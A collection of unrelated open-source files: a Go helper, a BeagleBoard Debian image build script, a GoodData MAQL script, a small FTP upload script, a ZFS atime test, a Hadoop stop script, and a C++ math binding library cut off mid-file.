DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
*/
package util
// StringContains looks for a string contained in a string array
func StringContains(item string, list []string) bool {
for _, a := range list {
if a == item {
return true
}
}
return false
}
|
#!/bin/bash -e
time=$(date +%Y-%m-%d)
mirror_dir="/var/www/html/rcn-ee.us/rootfs/bb.org/testing"
DIR="$PWD"
git pull --no-edit https://github.com/beagleboard/image-builder master
export apt_proxy=apt-proxy:3142/
if [ -d ./deploy ] ; then
sudo rm -rf ./deploy || true
fi
if [ ! -f jenkins.build ] ; then
./RootStock-NG.sh -c machinekit-debian-jessie
./RootStock-NG.sh -c bb.org-debian-jessie-console-v4.4
./RootStock-NG.sh -c bb.org-debian-jessie-iot-v4.4
./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-2gb-v4.4
./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-4gb-v4.4
./RootStock-NG.sh -c bb.org-debian-jessie-lxqt-4gb-xm
./RootStock-NG.sh -c seeed-debian-jessie-lxqt-4gb-v4.4
./RootStock-NG.sh -c seeed-debian-jessie-iot-v4.4
./RootStock-NG.sh -c bb.org-debian-jessie-oemflasher
./RootStock-NG.sh -c machinekit-debian-stretch
./RootStock-NG.sh -c bb.org-debian-stretch-console-v4.9
./RootStock-NG.sh -c bb.org-debian-stretch-iot-v4.9
./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-2gb-v4.9
./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-v4.9
./RootStock-NG.sh -c bb.org-debian-stretch-lxqt-xm
./RootStock-NG.sh -c bb.org-debian-stretch-oemflasher-v4.9
./RootStock-NG.sh -c bb.org-debian-buster-iot-v4.9
else
mkdir -p ${DIR}/deploy/ || true
fi
debian_jessie_machinekit="debian-8.10-machinekit-armhf-${time}"
debian_jessie_console="debian-8.10-console-armhf-${time}"
debian_jessie_iot="debian-8.10-iot-armhf-${time}"
debian_jessie_lxqt_2gb="debian-8.10-lxqt-2gb-armhf-${time}"
debian_jessie_lxqt_4gb="debian-8.10-lxqt-4gb-armhf-${time}"
debian_jessie_lxqt_xm_4gb="debian-8.10-lxqt-xm-4gb-armhf-${time}"
debian_jessie_oemflasher="debian-8.10-oemflasher-armhf-${time}"
debian_jessie_seeed_iot="debian-8.10-seeed-iot-armhf-${time}"
debian_jessie_seeed_lxqt_4gb="debian-8.10-seeed-lxqt-4gb-armhf-${time}"
debian_stretch_machinekit="debian-9.4-machinekit-armhf-${time}"
debian_stretch_console="debian-9.4-console-armhf-${time}"
debian_stretch_iot="debian-9.4-iot-armhf-${time}"
debian_stretch_lxqt_2gb="debian-9.4-lxqt-2gb-armhf-${time}"
debian_stretch_lxqt="debian-9.4-lxqt-armhf-${time}"
debian_stretch_lxqt_xm="debian-9.4-lxqt-xm-armhf-${time}"
debian_stretch_wayland="debian-9.4-wayland-armhf-${time}"
debian_stretch_oemflasher="debian-9.4-oemflasher-armhf-${time}"
debian_buster_iot="debian-buster-iot-armhf-${time}"
xz_img="xz -z -8"
#xz_tar="xz -z -8"
xz_tar="xz -T2 -z -8"
beaglebone="--dtb beaglebone --rootfs_label rootfs --hostname beaglebone --enable-uboot-cape-overlays"
pru_rproc_v44ti="--enable-uboot-pru-rproc-44ti"
pru_rproc_v49ti="--enable-uboot-pru-rproc-49ti"
pru_rproc_v414ti="--enable-uboot-pru-rproc-414ti"
beagle_xm="--dtb omap3-beagle-xm --rootfs_label rootfs --hostname beagleboard"
beagle_x15="--dtb am57xx-beagle-x15 --rootfs_label rootfs \
--hostname BeagleBoard-X15"
cat > ${DIR}/deploy/gift_wrap_final_images.sh <<-__EOF__
#!/bin/bash
wait_till_Xgb_free () {
memory=4096
free_memory=\$(free --mega | grep Mem | awk '{print \$7}')
until [ "\$free_memory" -gt "\$memory" ] ; do
free_memory=\$(free --mega | grep Mem | awk '{print \$7}')
echo "have [\$free_memory] need [\$memory]"
sleep 10
done
}
copy_base_rootfs_to_mirror () {
wait_till_Xgb_free
if [ -d ${mirror_dir}/ ] ; then
if [ ! -d ${mirror_dir}/${time}/\${blend}/ ] ; then
mkdir -p ${mirror_dir}/${time}/\${blend}/ || true
fi
if [ -d ${mirror_dir}/${time}/\${blend}/ ] ; then
if [ ! -f ${mirror_dir}/${time}/\${blend}/\${base_rootfs}.tar.xz ] ; then
cp -v \${base_rootfs}.tar ${mirror_dir}/${time}/\${blend}/
cd ${mirror_dir}/${time}/\${blend}/
${xz_tar} \${base_rootfs}.tar && sha256sum \${base_rootfs}.tar.xz > \${base_rootfs}.tar.xz.sha256sum &
cd -
fi
fi
fi
}
archive_base_rootfs () {
if [ -d ./\${base_rootfs} ] ; then
rm -rf \${base_rootfs} || true
fi
if [ -f \${base_rootfs}.tar ] ; then
copy_base_rootfs_to_mirror
fi
}
extract_base_rootfs () {
if [ -d ./\${base_rootfs} ] ; then
rm -rf \${base_rootfs} || true
fi
if [ -f \${base_rootfs}.tar.xz ] ; then
tar xf \${base_rootfs}.tar.xz
fi
if [ -f \${base_rootfs}.tar ] ; then
tar xf \${base_rootfs}.tar
fi
}
copy_img_to_mirror () {
wait_till_Xgb_free
if [ -d ${mirror_dir} ] ; then
if [ ! -d ${mirror_dir}/${time}/\${blend}/ ] ; then
mkdir -p ${mirror_dir}/${time}/\${blend}/ || true
fi
if [ -d ${mirror_dir}/${time}/\${blend}/ ] ; then
if [ ! -f ${mirror_dir}/${time}/\${blend}/\${wfile}.img.zx ] ; then
mv -v \${wfile}.img ${mirror_dir}/${time}/\${blend}/
sync
if [ -f \${wfile}.img.xz.job.txt ] ; then
mv -v \${wfile}.img.xz.job.txt ${mirror_dir}/${time}/\${blend}/
sync
fi
cd ${mirror_dir}/${time}/\${blend}/
${xz_img} \${wfile}.img && sha256sum \${wfile}.img.xz > \${wfile}.img.xz.sha256sum &
cd -
fi
fi
fi
}
archive_img () {
if [ -f \${wfile}.img ] ; then
copy_img_to_mirror
fi
}
generate_img () {
if [ -d \${base_rootfs}/ ] ; then
cd \${base_rootfs}/
sudo ./setup_sdcard.sh \${options}
sudo chown 1000:1000 *.img || true
sudo chown 1000:1000 *.job.txt || true
mv *.img ../ || true
mv *.job.txt ../ || true
cd ..
fi
}
###machinekit (jessie):
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###console images (jessie):
base_rootfs="${debian_jessie_console}" ; blend="console" ; extract_base_rootfs
options="--img-1gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-1gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-1gb a335-eeprom-\${base_rootfs} ${beaglebone} --a335-flasher" ; generate_img
options="--img-1gb bp00-eeprom-\${base_rootfs} ${beaglebone} --bp00-flasher" ; generate_img
options="--img-1gb am57xx-x15-eeprom-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-1gb am571x-sndrblock-eeprom-\${base_rootfs} ${beagle_x15} --emmc-flasher --am571x-sndrblock-flasher" ; generate_img
#options="--img-1gb me06-blank-\${base_rootfs} ${beaglebone} --me06-flasher" ; generate_img
#options="--img-1gb BBB-blank-\${base_rootfs} ${beaglebone} --emmc-flasher" ; generate_img
#options="--img-1gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher" ; generate_img
###iot image (jessie):
base_rootfs="${debian_jessie_iot}" ; blend="iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBL-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --bbbl-flasher" ; generate_img
#options="--img-4gb BBB-blank-uboot-overlay-\${base_rootfs} ${beaglebone} --emmc-flasher ${overlay}" ; generate_img
#options="--img-4gb BBBW-blank-\${base_rootfs} ${beaglebone} --bbbw-flasher" ; generate_img
###lxqt-2gb image (jessie):
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb" ; extract_base_rootfs
options="--img-2gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-2gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBW-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v44ti} --bbbw-flasher" ; generate_img
#options="--img-4gb BBB-blank-uboot-overlay-\${base_rootfs} ${beaglebone} --emmc-flasher ${overlay}" ; generate_img
#options="--img-4gb m10a-blank-\${base_rootfs} ${beaglebone} --m10a-flasher" ; generate_img
###lxqt-xm-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb" ; extract_base_rootfs
options="--img-4gb bbxm-\${base_rootfs} ${beagle_xm}" ; generate_img
###Seeed iot image (jessie):
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
#options="--img-4gb BBGW-blank-\${base_rootfs} ${beaglebone} --bbgw-flasher" ; generate_img
###Seeed lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
#options="--img-4gb BBG-blank-\${base_rootfs} ${beaglebone} --bbg-flasher" ; generate_img
###machinekit (stretch):
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit" ; extract_base_rootfs
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###console image (stretch):
base_rootfs="${debian_stretch_console}" ; blend="stretch-console" ; extract_base_rootfs
options="--img-1gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-1gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
###iot image (stretch):
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
options="--img-4gb BBBL-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --bbbl-flasher" ; generate_img
###lxqt-2gb image (stretch):
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb" ; extract_base_rootfs
options="--img-2gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-2gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bbx15-blank-\${base_rootfs} ${beagle_x15} --emmc-flasher --am57xx-x15-revc-flasher" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v49ti} --emmc-flasher" ; generate_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm" ; extract_base_rootfs
options="--img-4gb bbxm-\${base_rootfs} ${beagle_xm}" ; generate_img
### wayland image (stretch):
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone}" ; generate_img
###iot image (buster):
base_rootfs="${debian_buster_iot}" ; blend="buster-iot" ; extract_base_rootfs
options="--img-4gb bbx15-\${base_rootfs} ${beagle_x15}" ; generate_img
options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti}" ; generate_img
options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --emmc-flasher" ; generate_img
#options="--img-4gb bone-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --rootfs btrfs" ; generate_img
#options="--img-4gb BBB-blank-\${base_rootfs} ${beaglebone} ${pru_rproc_v414ti} --rootfs btrfs --emmc-flasher" ; generate_img
###archive *.tar
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit" ; archive_base_rootfs
base_rootfs="${debian_jessie_console}" ; blend="console" ; archive_base_rootfs
base_rootfs="${debian_jessie_iot}" ; blend="iot" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb" ; archive_base_rootfs
base_rootfs="${debian_jessie_oemflasher}" ; blend="oemflasher" ; archive_base_rootfs
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot" ; archive_base_rootfs
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb" ; archive_base_rootfs
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit" ; archive_base_rootfs
base_rootfs="${debian_stretch_console}" ; blend="stretch-console" ; archive_base_rootfs
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt" ; archive_base_rootfs
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm" ; archive_base_rootfs
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland" ; archive_base_rootfs
base_rootfs="${debian_stretch_oemflasher}" ; blend="stretch-oemflasher" ; archive_base_rootfs
base_rootfs="${debian_buster_iot}" ; blend="buster-iot" ; archive_base_rootfs
###archive *.img
###machinekit (jessie):
base_rootfs="${debian_jessie_machinekit}" ; blend="machinekit"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###console images (jessie):
base_rootfs="${debian_jessie_console}" ; blend="console"
wfile="bbx15-\${base_rootfs}-1gb" ; archive_img
wfile="bone-\${base_rootfs}-1gb" ; archive_img
wfile="a335-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="bp00-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="am57xx-x15-eeprom-\${base_rootfs}-1gb" ; archive_img
wfile="am571x-sndrblock-eeprom-\${base_rootfs}-1gb" ; archive_img
###iot image (jessie):
base_rootfs="${debian_jessie_iot}" ; blend="iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBL-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-2gb image (jessie):
base_rootfs="${debian_jessie_lxqt_2gb}" ; blend="lxqt-2gb"
wfile="bone-\${base_rootfs}-2gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-2gb" ; archive_img
###lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_4gb}" ; blend="lxqt-4gb"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bbx15-blank-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBW-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-xm-4gb image (jessie):
base_rootfs="${debian_jessie_lxqt_xm_4gb}" ; blend="lxqt-xm-4gb"
wfile="bbxm-\${base_rootfs}-4gb" ; archive_img
###Seeed iot image (jessie):
base_rootfs="${debian_jessie_seeed_iot}" ; blend="seeed-iot"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###Seeed lxqt-4gb image (jessie):
base_rootfs="${debian_jessie_seeed_lxqt_4gb}" ; blend="seeed-lxqt-4gb"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###machinekit (stretch):
base_rootfs="${debian_stretch_machinekit}" ; blend="stretch-machinekit"
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###console image (stretch):
base_rootfs="${debian_stretch_console}" ; blend="stretch-console"
wfile="bbx15-\${base_rootfs}-1gb" ; archive_img
wfile="bone-\${base_rootfs}-1gb" ; archive_img
###iot image (stretch):
base_rootfs="${debian_stretch_iot}" ; blend="stretch-iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
wfile="BBBL-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-2gb image (stretch):
base_rootfs="${debian_stretch_lxqt_2gb}" ; blend="stretch-lxqt-2gb"
wfile="bone-\${base_rootfs}-2gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-2gb" ; archive_img
###lxqt image (stretch):
base_rootfs="${debian_stretch_lxqt}" ; blend="stretch-lxqt"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bbx15-blank-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
###lxqt-xm image (stretch):
base_rootfs="${debian_stretch_lxqt_xm}" ; blend="stretch-lxqt-xm"
wfile="bbxm-\${base_rootfs}-4gb" ; archive_img
### wayland image (stretch):
base_rootfs="${debian_stretch_wayland}" ; blend="stretch-wayland"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
###iot image (buster):
base_rootfs="${debian_buster_iot}" ; blend="buster-iot"
wfile="bbx15-\${base_rootfs}-4gb" ; archive_img
wfile="bone-\${base_rootfs}-4gb" ; archive_img
wfile="BBB-blank-\${base_rootfs}-4gb" ; archive_img
__EOF__
chmod +x ${DIR}/deploy/gift_wrap_final_images.sh
image_prefix="bb.org"
#node:
if [ ! -d /var/www/html/farm/images/ ] ; then
if [ ! -d /mnt/farm/images/ ] ; then
#nfs mount...
sudo mount -a
fi
if [ -d /mnt/farm/images/ ] ; then
mkdir -p /mnt/farm/images/${image_prefix}-${time}/ || true
echo "Copying: *.tar to server: images/${image_prefix}-${time}/"
cp -v ${DIR}/deploy/*.tar /mnt/farm/images/${image_prefix}-${time}/ || true
cp -v ${DIR}/deploy/gift_wrap_final_images.sh /mnt/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
chmod +x /mnt/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
fi
fi
#x86:
if [ -d /var/www/html/farm/images/ ] ; then
mkdir -p /var/www/html/farm/images/${image_prefix}-${time}/ || true
echo "Copying: *.tar to server: images/${image_prefix}-${time}/"
cp -v ${DIR}/deploy/gift_wrap_final_images.sh /var/www/html/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
chmod +x /var/www/html/farm/images/${image_prefix}-${time}/gift_wrap_final_images.sh || true
sudo chown -R apt-cacher-ng:apt-cacher-ng /var/www/html/farm/images/${image_prefix}-${time}/ || true
fi
|
#!/bin/sh
set -e
. `dirname "$0"`/common.sh
DATASET="$1"
CSV_FILE="$DATA_DIR/${DATASET}.csv"
CONFIG_FILE="$MODEL_DIR/${DATASET}.config.xml"
PROJECT="${2:-$(cat tmp/pid)}"
UPDATE="${3:-}"
if [ ! "$CONFIG_FILE" ] ; then
die "Usage: $0 <dataset> [<project> [<update_flag>]]"
fi
if [ $UPDATE ] ; then
command='GenerateUpdateMaql'
else
command='GenerateMaql'
fi
script="
OpenProject(id = \"$PROJECT\");
UseCsv(hasHeader=\"true\", csvDataFile=\"$CSV_FILE\", configFile=\"$CONFIG_FILE\");
$command(maqlFile=\"tmp/${DATASET}.maql\"); "
echo "$script"
"$GDCL" -e "$script"
|
#!/bin/sh
HOST="172.16.238.15"
USER="$1"
PASS="$2"
FILE="$3"
#Choose random file
#FILE=$(ls /dataToShare/ | sort -R | tail -1)
cd /dataToShare
echo "CONNECTING ..."
ftp -p -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASS
pwd
ls
bin
verbose
prompt
put $FILE newfile
quit
END_SCRIPT
exit 0
|
#!/usr/local/bin/ksh93 -p
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms of the
# Common Development and Distribution License (the "License").
# You may not use this file except in compliance with the License.
#
# You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing permissions
# and limitations under the License.
#
# When distributing Covered Code, include this CDDL HEADER in each
# file and include the License file at usr/src/OPENSOLARIS.LICENSE.
# If applicable, add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your own identifying
# information: Portions Copyright [yyyy] [name of copyright owner]
#
# CDDL HEADER END
#
# $FreeBSD$
#
# Copyright 2007 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
# ident "@(#)atime_001_pos.ksh 1.2 07/01/09 SMI"
#
. $STF_SUITE/include/libtest.kshlib
. $STF_SUITE/tests/atime/atime_common.kshlib
################################################################################
#
# __stc_assertion_start
#
# ID: atime_001_pos
#
# DESCRIPTION:
# When atime=on, verify the access time for files is updated when read. It
# is available to fs and clone. To snapshot, it is unavailable.
#
# STRATEGY:
# 1. Create pool and fs.
# 2. Create '$TESTFILE' for fs.
# 3. Create snapshot and clone.
# 4. Setting atime=on on datasets except snapshot, and read '$TESTFILE'.
# 5. Expect the access time is updated on datasets except snapshot.
#
# TESTABILITY: explicit
#
# TEST_AUTOMATION_LEVEL: automated
#
# CODING_STATUS: COMPLETED (2005-07-11)
#
# __stc_assertion_end
#
################################################################################
verify_runnable "both"
log_assert "Setting atime=on, the access time for files is updated when read."
log_onexit cleanup
#
# Create $TESTFILE, snapshot and clone.
#
setup_snap_clone
for dst in $TESTPOOL/$TESTFS $TESTPOOL/$TESTCLONE $TESTPOOL/$TESTFS@$TESTSNAP
do
typeset mtpt=$(get_prop mountpoint $dst)
if [[ $dst == $TESTPOOL/$TESTFS@$TESTSNAP ]]; then
mtpt=$(snapshot_mountpoint $dst)
log_mustnot check_atime_updated $mtpt/$TESTFILE
else
log_must $ZFS set atime=on $dst
log_must check_atime_updated $mtpt/$TESTFILE
fi
done
log_pass "Verify the property atime=on passed."
|
#!/bin/bash
#
# (C) Copyright 2013 The CloudDOE Project and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contributors:
# Wei-Chun Chung (wcchung@iis.sinica.edu.tw)
# Yu-Chun Wang (zxaustin@iis.sinica.edu.tw)
#
# CloudDOE Project:
# http://clouddoe.iis.sinica.edu.tw/
#
if [ $# -lt 1 ]; then
echo "Using:" $0 "{HadoopDir}"; exit
else
if [ ! -d $1 ]; then
echo "---- [ERROR 4] $1 does not exist! ----"; exit
elif [ ! -x $1 ]; then
echo "---- [ERROR 4] $1 permission error! ----"; exit
fi
echo "---- [4] Stop Hadoop Cloud ----";
echo "---- [4.3] Stoping MapReduce/YARN ... ----"
if [ -e $1/bin/yarn ]; then
$1/sbin/stop-yarn.sh
else
$1/bin/stop-mapred.sh
fi
echo "---- [4.2] Stoping DFS... ----"
if [ -e $1/bin/yarn ]; then
$1/sbin/stop-dfs.sh
else
$1/bin/stop-dfs.sh
fi
# There is no 4.1 restore step
fi
# vim: ai ts=2 sw=2 et sts=2 ft=sh
|
/*
* Copyright 2016-2017 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File lib/math.cpp
*
*/
#include <random>
#include <limits>
#include "sm/lib/stdlib.h"
namespace sm{
constexpr float_t PI = 3.141592653589793;
constexpr float_t DOUBLE_PI = 3.141592653589793*2;
constexpr float_t E = 2.718281828459045;
namespace lib{
namespace random {
std::random_device random_device;
std::mt19937 mt(random_device());
std::uniform_real_distribution<> urd(0, 1);
}
smLibDecl(math){
smInitBox
smVar(PI, makeFloat(PI));
smVar(DOUBLE_PI, makeFloat(DOUBLE_PI));
smVar(E, makeFloat(E));
smVar(NAN, makeFloat(NAN));
smVar(INF, makeFloat(INFINITY))
smVar(MAX_INT, makeInteger(std::numeric_limits<integer_t>::max()));
smVar(MIN_INT, makeInteger(std::numeric_limits<integer_t>::min()));
smFunc(rand, smLambda {
return makeFloat(random::urd(random::mt));
})
smFunc(rand_int, smLambda {
if(args.size() < 2 || args[0]->type != ObjectType::INTEGER
|| args[1]->type != ObjectType::INTEGER)
return Object();
integer_t min = args[0]->i, max = args[1]->i;
if(max < min)
return Object();
else if(max == min)
return makeInteger(max);
integer_t distance = max - min;
return makeInteger(min + static_cast<integer_t>(random::urd(random::mt) * distance));
})
#define __SmBind(fnName, realName) \
smFunc(fnName, smLambda { \
if(args.empty()) \
return Object(); \
else if(args[0]->type == ObjectType::INTEGER) \
return makeFloat(std::realName(static_cast<float_t>(args[0]->i))); \
else if(args[0]->type == ObjectType::FLOAT) \
return makeFloat(std::realName(args[0]->f)); \
return Object(); \
})
#define __SmSnBind(fnName) __SmBind(fnName, fnName)
__SmSnBind(cos);
__SmSnBind(sin);
__SmSnBind(tan);
__SmSnBind(acos);
__SmSnBind(asin);
__SmSnBind(atan);
__SmSnBind(cosh);
__SmSnBind(sinh);
__SmSnBind(tanh);
__SmSnBind(acosh);
__SmSnBind(asinh);
__SmSnBind(atanh);
__SmSnBind(exp);
__SmSnBind(exp2);
__SmSnBind(log);
__SmSnBind(log2);
__SmSnBind(log10);
__SmSnBind(sqrt);
__SmSnBind(cbrt);
__SmSnBind(ceil);
__SmSnBind(floor);
__SmSnBind(round);
__SmSnBind(trunc);
#undef __SmBind
#undef __SmSnBind
smFunc(atan2, smLambda {
if(args.empty())
return Object();
float_t x, y;
if(args[0]->type == ObjectType::INTEGER)
x = args[0]->i;
else if(args[0]->type == ObjectType::FLOAT)
x = args[0]->f;
else return Object();
if(args[1]->type == ObjectType::INTEGER)
y = args[1]->i;
else if(args[1]->type == ObjectType::FLOAT)
y = args[1]->f;
else return Object();
return makeFloat(std::atan2(x, y));
})
smFunc(frexp, smLambda {
if(args.empty())
return Object();
float_t signif;
int exp;
if(args[0]->type == ObjectType::INTEGER)
signif = std::frexp(static_cast<float_t>(args[0]->i), &exp);
else if(args[0]->type == ObjectType::FLOAT)
signif = std::frexp(args[0]->f, &exp);
else
return Object();
return makeList(intp, RootObjectVec_t {makeFloat(signif), makeInteger(exp)});
})
smFunc(pow, smLambda {
if(args.empty())
return Object();
float_t x, y;
if(args[0]->type == ObjectType::INTEGER)
x = args[0]->i;
else if(args[0]->type == ObjectType::FLOAT)
x = args[0]->f;
else return Object();
if(args[1]->type == ObjectType::INTEGER)
y = args[1]->i;
else if(args[1]->type == ObjectType::FLOAT)
y = args[1]->f;
else return Object();
return makeFloat(std::pow(x, y));
})
smFunc(hypot, smLambda {
if(args.empty())
return Object();
float_t x, y;
if(args[0]->type == ObjectType::INTEGER)
x = args[0]->i;
else if(args[0]->type == ObjectType::FLOAT)
x = args[0]->f;
else return Object();
if(args[1]->type == ObjectType::INTEGER)
y = args[1]->i;
else if(args[1]->type == ObjectType::FLOAT)
y = args[1]->f;
else return Object();
return makeFloat(std::hypot(x, y));
})
smFunc(round_int, smLambda {
if(args.empty())
return Object();
else if(args[0]->type == ObjectType::INTEGER)
return makeInteger(std::lround(static_cast<float_t>(args[0]->i)));
else if(args[0]->type == ObjectType::FLOAT)
return makeInteger(std::lround(args[0]->f));
return Object();
})
